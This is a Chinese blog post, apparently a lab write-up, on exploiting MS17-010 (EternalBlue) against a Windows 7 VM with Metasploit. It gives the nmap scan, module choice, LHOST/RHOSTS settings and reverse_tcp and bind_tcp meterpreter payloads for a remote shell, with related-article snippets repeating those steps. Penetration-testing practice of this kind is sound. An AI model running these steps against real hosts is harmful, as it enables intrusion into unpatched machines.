metasploit 利用ms17-010(永恒之蓝)对 win7 进行攻击(好像是64位)

最新推荐文章于 2024-04-27 00:02:01 发布
最新推荐文章于 2024-04-27 00:02:01 发布
阅读量2.2k 收藏 10
点赞数 2
分类专栏: windows7 计算机网络 密码学 文章标签: windows 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pz641/article/details/112240737
版权

先说下问题和结果

ms17-010 攻击失败
ms17-010 fail
可以尝试以下两个payload

set payload windows/meterpreter/reverse_tcp 
set payload windows/x64/meterpreter/bind_tcp

然后就成功了在这里插入图片描述
在这里插入图片描述

零、开始

靶机镜像最好是老镜像或者没有保护的镜像,防火墙啥的都给关了。
nslookup domain [dns-server]
被动嗅探
在这里插入图片描述

然后nmap主动嗅探
推荐选项:-sS 使用它来执行一次隐秘的TCP扫描 -Pn 告诉nmap不要使用ping命令预先判断主机是否存活
推荐命令:nmap -sS -Pn 192.168.4.10

进入msf,使用ms17-010扫描器exploit
在这里插入图片描述

一、针对win7使用以下模块

use exploit/windows/smb/ms17_010_eternalblue

ms17_010_eternalblue这玩意只能用来攻击win7、win2008。
我之前用32位winXP靶机,攻击不了。初学者不懂这么多。
后来才知道 winXP应该用 exploit/windows/smb/ms17_010_psexec

show options

在这里插入图片描述

二、设置攻击载荷

set payload windows/meterpreter/reverse_tcp

三、设置一下LHOST攻击机192.168.137.4和RHOSTS靶机192.168.137.10

LPORT 攻击机端口8888(随便设,只要不冲突就行)
在这里插入图片描述

四、开始攻击

run

此时遇到好几次win7将在1分钟内自动关机,老夫不知道为啥,可能这个win7镜像比较新,有一点保护,fail是常态,大家可能试一下会成功。
在这里插入图片描述

五、更换载荷

 set payload windows/x64/meterpreter/bind_tcp
 show options

在这里插入图片描述
切换成功,继续攻击,得到开始的结果(此时还有可能引起win7重启)。
在这里插入图片描述

彩虹国操盘长
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
漏洞复现永恒之蓝MS-17010+修复
BROTHERYY的博客
08-20 1649
攻击机:192.168.20.101 靶机:192.168.20.103 使用msf的扫描模块,扫描靶机是否存在漏洞 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.20.103 run 使用攻击载荷进行攻击 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set rhosts 192.168.20.10
msf永恒之蓝漏洞复现及问题解决
weixin_53253733的博客
02-12 6907
IP kali:192.168100.101 Windows7:192.168.100.91 Windows系统需要关闭防火墙,尤其是公用网络设置应该关闭 开始 1,查找永恒之蓝漏洞 search ms17_010 show options:展现需要设置的模块 使用漏洞 注:RHOST:靶机IP地址,即为Windows7的IP地址,set RHOST 192.168.100.91 RPORT:靶机端口号, 默认445端口,不必设置 LHOST:攻击机I...
关于win7新系统不能永恒之蓝渗透和 Meterpreter出现stdapi_sys_power_exitwindows的一些小见解
qq_47077502的博客
04-11 1693
解决新win7不能永恒之蓝扫描和Meterpreter不能重启和关机的问题
利用永恒之蓝漏洞(ms17-010)对win7上传勒索病
最新发布
m0_74402888的博客
04-27 970
攻击机kali:192.168.83.136靶机win7:192.168.83.144。
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 2822
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
利用漏洞永恒之蓝ms17-010win7目标进行渗透
ABABC1234的博客
07-06 1109
使用kali进行渗透总的来说就是三大步骤,即:使用模块=》设置模块=》运行模块以上仅供自己总结使用,但也欢迎大佬们指正存在的错误。在这里提醒每一位网络安全学习者不要利用技术做违法的事情,不然真的会很刑!!!
利用永恒之蓝渗透WIN7
Cwillchris的博客
10-18 3871
实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:172.16.12.4 用户名:administrator 密码:vgrant 实验步骤: 配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled 查看MS17-010相关模块,并使用序号3扫描模块扫描目标及 msf6 > search ms17-010 msf6
Windows漏洞 MS17-010 / EternalBlue(永恒之蓝)工具-易语言
06-11
MS17-010 / EternalBlue(永恒之蓝) 漏洞 检测工具 百度百科: https://baike.baidu.com/item/永恒之蓝 本源码 无调用 任何模块 测试环境: Microsoft Windows XP x86 Microsoft Windows Server 2003 x86 漏洞涉及 ...
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
AutoBlue-MS17-010:这是半自动的,完全正常工作,no-bs,非metasploit版本的MS17-010公共漏洞利用代码
02-06
MS17-010利用代码这是一些no-bs公共漏洞利用代码,可以为永恒的蓝色漏洞利用生成有效的shellcode,并使用metasploit多处理程序编写事件侦听器的脚本。 此版本的漏洞利用程序以无需使用metasploit即可利用永恒蓝色的...
MS17-010:MS17-010 Poc Shell 调用Nmap and Metasploit 内网445测试的一款Poc
05-18
永恒之蓝 MS17-010 Scan and Exploit Shell Usage MAC OSX git clone https://github.com/xaiJoker/MS17-010/ cd ms17-010 && chmod +x ms17-010.sh sh ms17-010.sh Linux git clone ...
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
记录一次永恒之蓝ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3860
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
metasploit(MSF)渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 1937
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
ms17-010永恒之蓝漏洞复现
qq_44504968的博客
04-21 325
ms17-010永恒之蓝漏洞复现一、漏洞原理二、漏洞风险等级三、漏洞影响范围四、实验环境4.1靶机:4.2攻击机:五、漏洞复现 一、漏洞原理 二、漏洞风险等级 三、漏洞影响范围 四、实验环境 4.1靶机: 4.1.1、系统:windows 7 4.1.2、IP:192.168.22.140 4.2攻击机: 系统:kali IP:192.168.22.xx 五、漏洞复现 5.1.1、利用msf查看靶机是否存在漏洞 5.1.2、若存在漏洞,利用msf工具拿到shell ...
MSF之ms17-010永恒之蓝漏洞利用
热门推荐
极光时流
11-26 1万+
MSF之ms17-010永恒之蓝漏洞利用准备扫描漏洞漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali系统,其IP为:192.168.207.130 攻击工具:kali自带的msfconsole工具 扫描漏洞 在kali终端中输入msfconsole use auxiliary/scanner/smb/s...
Kali Linux:用永恒之蓝Windows 7 进行渗透并揭密勒索病毒攻击方法
GitChat
02-05 5701
提示:本文章内所有内容环境为自己搭建绝无违法内容,请不要利用其中的技术来做违法的事情。 声明:法律问题与本作者无关,请自觉遵守! 实施利用 Kali Linux 对 Windows7 SP1 进行永恒之蓝操作,所以操作将在虚拟机上完成。...
ms17-010直接拿meterpreter权限
qq_38240166的博客
03-07 8321
小白,第一次写博客,轻喷写的不好请指出最近无聊就装了个msf玩玩ms17-010,只要你开了445端口,又没打补丁,那就很容易gg先开个msf进一下利用模块。然后简单的设置一下ip和payload。设置完开始攻击这样子就获得一个会话。输入shell看看发现乱码,调一下编码就行了。第一次玩msf,所以看了两天的书才搞懂这些...
如何使用metasploit利用ms17-010漏洞对模拟靶机进行攻击
06-09
MS17-010漏洞是指Windows SMB远程代码执行漏洞,可以通过Metasploit利用这个漏洞对目标系统进行攻击。下面是攻击步骤: 1. 打开Metasploit控制台,输入`msfconsole`命令启动。 2. 搜索MS17-010漏洞模块,输入命令`search ms17-010`。 3. 选择对应的漏洞模块,输入命令`use exploit/windows/smb/ms17_010_eternalblue`。 4. 设置目标IP地址,输入命令`set RHOSTS <目标IP地址>`。 5. 设置攻击机监听的IP地址和端口号,输入命令`set LHOST <攻击机IP地址>`和`set LPORT <监听端口号>`。 6. 运行漏洞模块,输入命令`exploit`。 7. 如果攻击成功,将会创建一个会话,可以通过命令`sessions`查看当前会话列表。 8. 输入命令`sessions -i <会话ID>`进入会话,这样就可以执行一些命令,例如`sysinfo`查看目标系统信息,`shell`获取一个交互式shell等。 需要注意的是,这是一种非常危险的行为,必须在合法的环境下使用,否则可能会对他人和自己造成严重的损失。建议在使用前仔细阅读Metasploit的文档和指南,并遵守相关法律法规。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值